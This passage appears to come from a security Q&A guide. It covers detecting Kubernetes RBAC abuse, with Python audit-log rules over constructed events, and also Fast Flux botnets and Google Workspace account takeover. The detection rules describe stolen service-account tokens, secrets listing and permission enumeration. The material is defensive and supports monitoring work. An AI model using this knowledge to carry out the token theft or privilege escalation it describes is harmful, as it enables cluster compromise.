Look in the API server audit log for service account tokens used from IPs outside the pod network or from outside the cluster.
Monitor for permission enumeration (bursts of SelfSubjectAccessReview / SelfSubjectRulesReview, which is what kubectl auth can-i generates) followed by creation of RoleBindings or ClusterRoleBindings, pods/exec, or secrets listing by service accounts.
Mitigation:
Follow the least privilege principle for Kubernetes RBAC policies: avoid wildcard verbs and cluster-admin bindings, and disable automounting of service account tokens where they are not needed.
Regularly audit RoleBindings and ClusterRoles, and enforce admission policies that block privileged pods.
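
The audit-log rules above, as an added example that is not part of the original document or of any Kubernetes project code. Field names follow the audit.k8s.io Event schema at Metadata level; the events, namespaces, usernames and pod CIDR are constructed for this illustration.

```python
# Added example: RBAC-abuse rules over Kubernetes API server audit events.
# Events below are constructed; field names follow the audit.k8s.io Event schema.
import ipaddress
from collections import Counter

POD_CIDR = ipaddress.ip_network("10.244.0.0/16")     # hypothetical cluster pod network
RBAC_RESOURCES = {"roles", "rolebindings", "clusterroles", "clusterrolebindings"}
ENUM_RESOURCES = {"selfsubjectaccessreviews", "selfsubjectrulesreviews"}
WRITE_VERBS = {"create", "update", "patch"}


def _ev(username, verb, resource, ip, code, namespace=None, name=None, subresource=None):
    """Build a minimal audit Event; used only to construct the sample below."""
    ref = {"resource": resource}
    if namespace:
        ref["namespace"] = namespace
    if name:
        ref["name"] = name
    if subresource:
        ref["subresource"] = subresource
    return {"user": {"username": username}, "verb": verb, "objectRef": ref,
            "sourceIPs": [ip], "responseStatus": {"code": code}}


FRONTEND = "system:serviceaccount:shop:frontend"
AUDIT_EVENTS = [
    _ev(FRONTEND, "get", "configmaps", "10.244.3.17", 200, namespace="shop"),          # normal
    _ev(FRONTEND, "create", "selfsubjectrulesreviews", "10.244.3.17", 201),             # kubectl auth can-i --list
    _ev(FRONTEND, "create", "selfsubjectaccessreviews", "10.244.3.17", 201),
    _ev(FRONTEND, "create", "selfsubjectaccessreviews", "10.244.3.17", 201),
    _ev(FRONTEND, "create", "clusterrolebindings", "10.244.3.17", 201, name="debug-admin"),  # self-grant
    _ev("system:serviceaccount:ci:runner", "list", "secrets", "203.0.113.9", 200, namespace="kube-system"),  # stolen token
    _ev("alice@example.com", "create", "rolebindings", "10.0.5.20", 201, namespace="shop", name="dev-view"),  # human admin
    _ev("system:serviceaccount:shop:worker", "list", "secrets", "10.244.5.2", 403, namespace="shop"),
    _ev("system:serviceaccount:shop:worker", "list", "secrets", "10.244.5.2", 403, namespace="shop"),
    _ev("system:serviceaccount:shop:worker", "list", "secrets", "10.244.5.2", 403, namespace="shop"),
]


def is_service_account(ev):
    return ev["user"]["username"].startswith("system:serviceaccount:")


def rbac_grants_by_service_accounts(events):
    """Service accounts successfully writing RBAC objects; pods almost never need to."""
    return [(ev["user"]["username"], ev["objectRef"]["resource"], ev["objectRef"].get("name"))
            for ev in events
            if is_service_account(ev) and ev["verb"] in WRITE_VERBS
            and ev["objectRef"].get("resource") in RBAC_RESOURCES
            and ev["responseStatus"]["code"] < 400]


def sa_tokens_outside_pod_network(events, pod_cidr=POD_CIDR):
    """A pod's token presented from outside the pod CIDR usually means the token was stolen."""
    return sorted({(ev["user"]["username"], ip) for ev in events if is_service_account(ev)
                   for ip in ev.get("sourceIPs", []) if ipaddress.ip_address(ip) not in pod_cidr})


def permission_enumeration(events, threshold=3):
    """Bursts of SelfSubjectAccessReview / SelfSubjectRulesReview creation (kubectl auth can-i)."""
    counts = Counter(ev["user"]["username"] for ev in events
                     if ev["verb"] == "create" and ev["objectRef"].get("resource") in ENUM_RESOURCES)
    return {user: n for user, n in counts.items() if n >= threshold}


def forbidden_bursts(events, threshold=3):
    """Repeated 403s from one identity: probing for what a token can reach."""
    counts = Counter(ev["user"]["username"] for ev in events if ev["responseStatus"]["code"] == 403)
    return {user: n for user, n in counts.items() if n >= threshold}
```

The pod-CIDR rule assumes the API server sees pod source addresses directly; behind a NAT or an ingress proxy the sourceIPs field records the proxy and the rule must be adapted to node addresses instead.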

129. How do you detect a Fast Flux botnet?

Answer:
Attackers rotate the A records of a domain across many compromised hosts with very low TTLs, so C2 or phishing infrastructure cannot be taken down by blocking a single IP.
Detection:
Look for domains whose resolutions change frequently across many IPs in different ASNs and countries, with TTLs of a few minutes or less.
Monitor multiple IP addresses being associated with a single domain in a short time, particularly IPs in residential ranges rather than hosting providers.
Mitigation:
Use DNS filtering and threat intelligence feeds (domain reputation, newly observed domains).
Block known Fast Flux domains at the DNS resolver or firewall level and investigate the hosts that query them.

130. How do you investigate a Google Workspace account takeover?

Answer:
Detection:
Look for Google Admin audit log events showing password resets, MFA or recovery-option changes, and new app-specific passwords.
Monitor OAuth token grants to unknown third-party apps, new mail forwarding or filter rules, and Drive files shared to external accounts.
Mitigation:
Enforce OAuth app allowlisting and block unverified apps.
Require hardware-based MFA (Titan Security Keys or other FIDO2 keys) and enroll high-risk users in Advanced Protection.
